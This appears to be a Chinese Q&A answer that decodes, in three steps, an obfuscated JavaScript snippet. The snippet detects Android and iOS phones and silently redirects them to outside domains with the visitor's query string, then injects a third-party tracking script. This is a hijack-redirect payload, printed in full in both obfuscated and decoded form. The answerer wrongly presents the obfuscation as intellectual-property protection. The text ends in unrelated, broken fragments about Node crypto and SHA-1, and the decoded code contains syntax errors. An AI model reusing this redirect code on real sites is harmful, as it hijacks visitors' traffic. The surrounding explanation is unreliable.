第一步解码:
var _$ = ["\x77\x66", "\x3f", "\x26\x74\x3d\x7a\x72", '\x54\x72\x69\x64\x65\x6e\x74', '\x50\x72\x65\x73\x74\x6f', '\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74', '\x47\x65\x63\x6b\x6f', '\x4b\x48\x54\x4d\x4c', '\x41\x6e\x64\x72\x6f\x69\x64', '\x4c\x69\x6e\x75\x78', '\x69\x50\x68\x6f\x6e\x65', '\x69\x50\x61\x64', '\x53\x61\x66\x61\x72\x69', "\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x2d\x67\x6f\x6f\x67\x6c\x65\x2d\x73\x6f\x67\x6f\x75\x2d\x73\x6f\x73\x6f\x2d\x33\x36\x30\x2d\x71\x71\x2e\x6d\x61\x68\x6a\x75\x6e\x2e\x63\x6f\x6d\x2f\x63\x64\x6e\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x3f", '\x68\x74\x74\x70\x3a\x2f\x2f\x69\x6f\x73\x2e\x61\x64\x61\x6e\x7a\x68\x75\x6f\x2e\x63\x6f\x6d\x2f\x67\x6f\x33\x2e\x70\x68\x70\x3f', '\x26\x74\x69\x64\x3d\x31\x35', "\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\'\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\'\x20\x63\x68\x61\x72\x73\x65\x74\x3d\'\x67\x62\x32\x33\x31\x32\'\x20\x73\x72\x63\x3d\'\x68\x74\x74\x70\x3a\x2f\x2f\x6a\x73\x2e\x61\x64\x6d\x2e\x63\x6e\x7a\x7a\x2e\x6e\x65\x74\x2f\x73\x2e\x70\x68\x70\x3f\x73\x69\x64\x3d\x32\x36\x37\x31\x37\x34\'\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"]var a = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"](_$[0])["\x73\x72\x63"]src = a["\x73\x70\x6c\x69\x74"](_$[1])[0x1] + _$[2]
var b = {
versions: function() {
var c = navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"],
d = navigator["\x61\x70\x70\x56\x65\x72\x73\x69\x6f\x6e"]
return {
trident: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[3]) > -0x1,
presto: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[4]) > -0x1,
webKit: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[5]) > -0x1,
gecko: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[6]) > -0x1 && c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[7]) == -0x1,
mobile: !!c["\x6d\x61\x74\x63\x68"](/AppleWebKit.*Mobile.*/),
ios: !!c["\x6d\x61\x74\x63\x68"](/\(i[^]+( U)? CPU.+Mac OS X/),
android: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[8]) > -0x1 || c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[9]) > -0x1,
iPhone: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[10]) > -0x1,
iPad: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[11]) > -0x1,
webApp: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[12]) == -0x1
}
} (),
language: (navigator["\x62\x72\x6f\x77\x73\x65\x72\x4c\x61\x6e\x67\x75\x61\x67\x65"] || navigator["\x6c\x61\x6e\x67\x75\x61\x67\x65"])["\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65"]()
}
if (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x6d\x6f\x62\x69\x6c\x65"] != false && b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x61\x6e\x64\x72\x6f\x69\x64"] != false) {
window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x72\x65\x66"] = _$[13] + src
} else if (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x6d\x6f\x62\x69\x6c\x65"] != false && (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x68\x6f\x6e\x65"] != false || b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x61\x64"] != false || b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x6f\x64"] != false)) {
window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x72\x65\x66"] = _$[14] + src + _$[15]
}
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"](_$[16])
第二步解码:
var _$ = ["wf", "?", "&t=zr", 'Trident', 'presto', 'AppleWebkit', 'Gecko', 'kHTML', 'Android', 'Linux', 'iphone', 'ipad', 'Safari', '&tid=15', "<script type=\'text/javascript\' charset=\'gb2312\' src=\'http://js.adm.cnzz.net/s.php?sid=267174\'></script>"]
var a = window["document"]["getElementById"](_$[0])["src"]src = a["split"](_$[1])[0x1] + _$[2]
var b = {
versions: function() {
var c = navigator["userAgent"],
d = navigator["appVersion"]
return {
trident: c["indexOf"](_$[3]) > -0x1,
presto: c["indexOf"](_$[4]) > -0x1,
webKit: c["indexOf"](_$[5]) > -0x1,
gecko: c["indexOf"](_$[6]) > -0x1 && c["indexOf"](_$[7]) == -0x1,
mobile: !!c["match"](/AppleWebKit.*Mobile.*/),
ios: !!c["match"](/\(i[^]+( U)? CPU.+Mac OS X/),
android: c["indexOf"](_$[8]) > -0x1 || c["indexOf"](_$[9]) > -0x1,
iPhone: c["indexOf"](_$[10]) > -0x1,
iPad: c["indexOf"](_$[11]) > -0x1,
webApp: c["indexOf"](_$[12]) == -0x1
}
} (),
language: (navigator["browserLanguage"] || navigator["language"])["toLower\x43ase"]()
}
if (b["versions"]["mobile"] != false && b["versions"]["android"] != false) {
window["location"]["href"] = _$[13] + src
} else if (b["versions"]["mobile"] != false && (b["versions"]["iphone"] != false || b["versions"]["ipad"] != false || b["versions"]["ipod"] != false)) {
window["location"]["href"] = _$[14] + src + _$[15]
}
window["document"]["writeln"](_$[16])
第三步解码
var a = document.getElementById('wf').srcsrc = a.split('?')[1] + '&t=zr'
var b = {
versions: function() {
var c = navigator.userAgent,
d = navigator.appVersion
return {
trident: c.indexOf('Trident') > -1,
presto: c.indexOf( 'presto') > -1,
webKit: c.indexOf('AppleWebkit') > -1,
gecko: c.indexOf('Gecko') > -1 && c.indexOf('kHTML') == -1,
mobile: !!c.match.(/AppleWebKit.*Mobile.*/),
ios: !!c.match(/\(i[^]+( U)? CPU.+Mac OS X/),
android: c.indexOf('Android') > -1 || c.indexOf('Linux') > -1,
iPhone: c.indexOf('iphone') > -1,
iPad: c.indexOf('ipad') > -1,
webApp: c.indexOf('Safari') == -1
}
} (),
language: (navigator.browserLanguage || navigator.language).toLowerCase()
}
if (b["versions"]["mobile"] != false && b["versions"]["android"] != false) {
location.href = 'http://baidu-google-sogou-soso-360-qq.mahjun.com/cdn/index.html?' + src
} else if (b["versions"]["mobile"] != false && (b["versions"]["iphone"] != false || b["versions"]["ipad"] != false || b["versions"]["ipod"] != false)) {
location.href = 'http://ios.adanzhuo.com/go3.php?' + src + '&tid=15'
}
document.writeln('<script type=\'text/javascript\' charset=\'gb2312\' src=\'http://js.adm.cnzz.net/s.php?sid=267174\'></script>')
你好!js是脚本解释性语言可即时查看代码。为保护知识产权,很多很有创意的代码开发者对其做了加密处理,在其中加入混淆码,使用时需要按一定规律进行解密才能为浏览器识别。个人愚见,供参考采纳!// node的crypto模块DH算法是一种密钥交换协议,它可以让双方在不泄漏密钥的情况下协商出一个密钥来。
示例见 https://www.liaoxuefeng.com/wiki/1022910821149312/1023025778520640
SHA-1不够安全,不能继续使用,是SHA-1的后继者
